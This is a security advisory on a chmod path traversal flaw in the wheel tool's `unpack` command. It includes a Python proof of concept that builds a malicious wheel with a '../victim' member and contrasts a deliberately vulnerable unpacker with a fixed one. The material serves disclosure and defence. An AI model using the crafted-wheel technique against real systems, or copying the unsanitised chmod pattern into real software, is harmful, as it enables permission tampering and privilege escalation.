pypa wheel
cpe:2.3:a:wheel_project:wheel:*:*:*:*:python:*:*
- <= 0.46.1
A path traversal vulnerability exists in the `unpack` command of the wheel command line tool, in versions through 0.46.1. The `unpack` function extracts each archive member and then restores the member's Unix permission bits with a chmod, but it builds the chmod target from the member's filename as stored in the archive header rather than from the path the extraction actually wrote to. A crafted wheel whose member names contain `../` components therefore causes the chmod to be applied to files outside the extraction directory, for example /etc/passwd or SSH keys, even though the member's contents are written inside the destination directory.
Exploitation allows arbitrary modification of the permission bits of existing files, which can lead to privilege escalation or arbitrary code execution, for instance by making a script that is later run with higher privileges writable by the attacker. A chmod only succeeds on files the unpacking user owns (or on any file when running as root), so the practical targets are the victim's own files, such as SSH keys in their home directory, or system files when `wheel unpack` is run as root.
The vulnerability can be reproduced with the `unpack` function from the wheel library or from the copy vendored in setuptools. First, a malicious wheel is built containing a member whose name carries a path traversal payload pointing at a file outside the extraction directory, with the desired permission bits set in the member's external attributes. When this wheel is unpacked with the vulnerable `unpack` function, the underlying zip extraction sanitises the member name and writes the file inside the destination directory, but the subsequent chmod uses the unsanitised archive name, so the permissions of the targeted outside file are changed.
Users should upgrade to wheel 0.46.2, which fixes the issue by applying the permission change to the sanitised path that was actually written during extraction rather than to a path built from the archive header's filename.
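The following is an added example, not code from the wheel project: it reconstructs the vulnerable extract-then-chmod pattern described above with the standard library `zipfile` module, places the hardened variant beside it, and runs both against a constructed wheel in a temporary directory. The function names, the member name `../victim` and the stand-in target file are assumptions made for the demonstration; the chmod semantics are Unix-specific.

```python
"""Reproduce and fix the chmod path traversal pattern in a wheel unpacker.

This is a reconstruction for illustration, not the wheel project's code.
"""
import stat
import tempfile
import zipfile
from pathlib import Path


def build_malicious_wheel(whl_path: Path, member_name: str, mode: int) -> None:
    """Write a wheel-like zip (constructed input) whose single member has a
    traversal name and carries `mode` in its Unix external attributes."""
    with zipfile.ZipFile(whl_path, "w") as zf:
        zinfo = zipfile.ZipInfo(member_name)
        # The Unix mode lives in the high 16 bits of external_attr.
        zinfo.external_attr = (stat.S_IFREG | mode) << 16
        zf.writestr(zinfo, b"payload\n")


def unpack_vulnerable(whl_path: Path, dest: Path) -> None:
    """Hypothetical reconstruction of the vulnerable pattern.

    ZipFile.extract() strips '..' components and writes inside `dest`, but
    the chmod target is rebuilt from the raw archive member name, so it can
    point outside `dest`.
    """
    with zipfile.ZipFile(whl_path) as zf:
        for zinfo in zf.infolist():
            zf.extract(zinfo, dest)
            permissions = zinfo.external_attr >> 16 & 0o777
            dest.joinpath(zinfo.filename).chmod(permissions)  # unsanitised path


def unpack_fixed(whl_path: Path, dest: Path) -> None:
    """Hardened variant: chmod only the path extract() actually wrote to."""
    with zipfile.ZipFile(whl_path) as zf:
        for zinfo in zf.infolist():
            extracted = Path(zf.extract(zinfo, dest))
            permissions = zinfo.external_attr >> 16 & 0o777
            extracted.chmod(permissions)


def demo() -> dict:
    """Run both unpackers against a file that sits outside the extraction
    directory and return its permission bits after each run."""
    results = {}
    for name, unpacker in (("vulnerable", unpack_vulnerable), ("fixed", unpack_fixed)):
        with tempfile.TemporaryDirectory() as tmp:
            tmp = Path(tmp)
            # Stand-in for /etc/passwd or ~/.ssh/id_rsa: owned by us, mode 0600.
            victim = tmp / "victim"
            victim.write_bytes(b"secret\n")
            victim.chmod(0o600)

            whl = tmp / "evil-1.0-py3-none-any.whl"
            build_malicious_wheel(whl, "../victim", 0o777)

            dest = tmp / "unpacked"
            unpacker(whl, dest)

            # In both cases the payload itself lands inside dest ...
            assert (dest / "victim").is_file()
            # ... but only the vulnerable unpacker touched the outside file.
            results[name] = stat.S_IMODE(victim.stat().st_mode)
    return results


if __name__ == "__main__":
    print({name: oct(mode) for name, mode in demo().items()})
```

The vulnerable run leaves the outside file world-writable (mode 0777) while the fixed run leaves it at 0600; the extracted copy of the member ends up inside the destination directory in both cases, which is why the traversal is easy to miss if you only inspect what was written.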